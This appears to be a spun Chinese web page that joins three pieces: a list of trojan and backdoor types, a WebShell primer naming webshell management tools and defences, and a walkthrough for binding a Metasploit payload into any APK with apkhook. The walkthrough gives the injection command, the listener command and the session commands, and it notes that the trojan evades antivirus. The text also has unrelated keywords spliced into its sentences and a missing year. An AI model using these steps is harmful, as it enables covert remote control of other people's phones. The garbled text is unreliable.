1.计算机后门木马种类包括
2.米桃安全漏洞讲堂系列第4期：WebShell木马专题
3.msf注入apk捆板木马实验

计算机后门木马种类包括

       计算机后门木马的木马种类繁多，其中包括以下几种：

       1. 特洛伊木马（Trojan）：这种木马病毒的源码主要目的是**用户信息。它们的木马共同特征是隐蔽性极强，能够在用户不知情的源码情况下执行恶意操作。

       2. 系统病毒：这类病毒通常以Win、木马PE、源码翻墙后 chrome 源码Win、木马W、源码W等为前缀，木马它们主要感染Windows系统的源码可执行文件，通过这些文件传播自身。木马

       3. 蠕虫病毒（Worm）：蠕虫病毒以前缀Worm为特征，源码它们通过网络或系统漏洞进行传播，木马能够在短时间内感染大量计算机。源码

       4. 脚本病毒（Script）：脚本病毒的木马特点是使用脚本语言编写，如Python、金股低吸源码Perl等，它们通常通过电子邮件附件或网页脚本进行传播。

       5. 后门病毒（Backdoor）：后门病毒以前缀Backdoor为标识，它们在感染计算机后，会在系统中打开后门，使黑客能够远程控制受感染的机器。

       在年，IRC后门病毒在全球范围内大规模爆发。这类病毒不仅存在泄露本地信息的风险，还可能在局域网中传播，导致网络阻塞，给用户带来安全隐患和经济损失。由于病毒源代码公开，任何人都可以修改并生成新的变种，加之病毒具有强大的开源交易所源码变形能力，给病毒的检测和清除带来了极大的挑战。

米桃安全漏洞讲堂系列第4期：WebShell木马专题

       WebShell是黑客常用的恶意脚本，也称为木马后门。其目的是获取服务器的操作权限，如执行系统命令、窃取文件、访问数据库、修改网页等，其危害性不言而喻。黑客利用常见的漏洞，如文件上传、SQL注入、远程文件包含等，作为社会工程攻击的一部分，最终达到控制网站服务器的来源软件模板模式源码目的。

       WebShell的特点如下：

       1.1 WebShell就是网络上的特洛伊木马，也可称为后门。黑客在对目标进行攻击时，会使用各类漏洞工具进行尝试，在攻击行为后半段，常常会使用WebShell木马对攻陷的主机进一步利用，以及后续的内网横向扩展。

       1.2 黑客之所以青睐WebShell工具，主要因为WebShell有以下三大优势：

       WebShell的分类从编程语言角度，常见的WebShell脚本类型包括asp、aspx、jsp、php。若从广义的木马角度，还可包括python、易联充值系统源码perl等脚本语言。从木马文件大小的角度分类，可分为大马、小马、一句话木马、内存马。随着木马体积的增大，功能也相对更丰富。但其隐蔽性越弱，特征明显，容易被安全防护设备识别。

       2.1 大马：体积大、功能全，具有文件管理、数据库管理、账号权限管理的能力，如phpSpy、jspSpy等常见大马。

       2.2 小马：体积小、容易被上传，一般只具备文件上传功能，通常被用于下载大马。缺点是功能单一、隐藏性差。

       2.3 一句话木马：一句话木马相比大马有本质的区别，用一句简短的代码来承载payload，将动辄十几K或者更大的大马&小马变成了几个字节。一句话代码极为精炼，不像小马&大马一样将直接功能写在脚本文件中，因此几乎没有什么特征，很难被病毒引擎检测到。一句话木马的出现，将攻击门槛和攻击成本大幅拉低，这也是目前最常见的WebShell攻击手段。

       2.4 内存马：内存马是目前检测难度最高的WebShell，是一种无文件木马，在服务器端没有文件实体，而是通过Web中间件污染系统内存，实现恶意代码驻留，再通过远程工具连接即可利用中间件执行恶意操作，比一句话木马的检测难度更高，近年来备受攻击者追捧，但也有一定缺陷，比如Web中间件重启后就会被释放掉。

       WebShell木马危害及利用方式：

       3.1 从一句话木马到控制主机：以下以一个BC网站为案例说明，如何用木马实现对目标主机的控制。

       3.2 WebShell管理工具：常规的大马、小马、一句话木马、内存马，在木马隐蔽性和木马的功能丰富程度之间往往无法兼顾。为此，逐步发展出对WebShell木马的管理工具，能按场景生成需要的木马文件，兼顾木马免杀和功能丰富。常用的WebShell管理工具包括，中国菜刀（Chopper）、冰蝎（Behinder）、蚁剑（AntSword）、哥斯拉（Godzilla）。

       WebShell木马检测及防护：

       4.1 WebShell检测技术：当今主流使用如下四种方式。

       4.2 WebShell木马防御建议：对于WebShell木马的防御，主要思路是切断其攻击链路。从企业防护角度，可从如下三方面入手：线上运维侧（前端）、研发侧（后端）、用户侧。

       总结展望：

       本文主要介绍了WebShell木马的特点、攻击方式及检测防护方法。企业在预防WebShell攻击方面需注重安全意识培训、安全开发、线上安全监测、定期审计等。而未来的趋势将聚焦于整合人工智能、零信任模型和协同防御。

msf注入apk捆板木马实验

       实验材料:

       小米手机、termux高级终端、kali网络猎人虚拟机、开源项目apkhook、文件上传下载小工具http_server

       实验目标:在任意apk中注入msf木马

       实验过程:

       1.搭建环境

       下载并获取apkhook项目

       安装python3、java环境

       配置http_server工具

       实现内网穿透

       2.制作payload并启动http_server

       将vx.apk视频APP上传至apkhook目录

       使用命令注入payload

       python main.py --lhost youip --lport youport -n vx.apk

       填写公网IP与端口，本地映射至.0.0.0.1:端口

       生成注入成功的apk与监听脚本

       远控Apk位于/root/apkhook/WorkDir/AllFinish.apk

       监听脚本位于/root/apkhook/WorkDir/handler.rc

       3.下载并安装apk

       4.启动脚本监听

       msfconsole -r WorkDir/handler.rc

       查看并使用上线会话

       sessions -l、sessions -i id

       实验总结:

       1.未安装java环境，习惯使用full版本导致问题

       2.木马免杀，但存在安装风险

       3.权限申请问题，特别在安卓8及以上版本需注意

       4.使用网络猎人虚拟机执行msfconsole速度缓慢，需等待约秒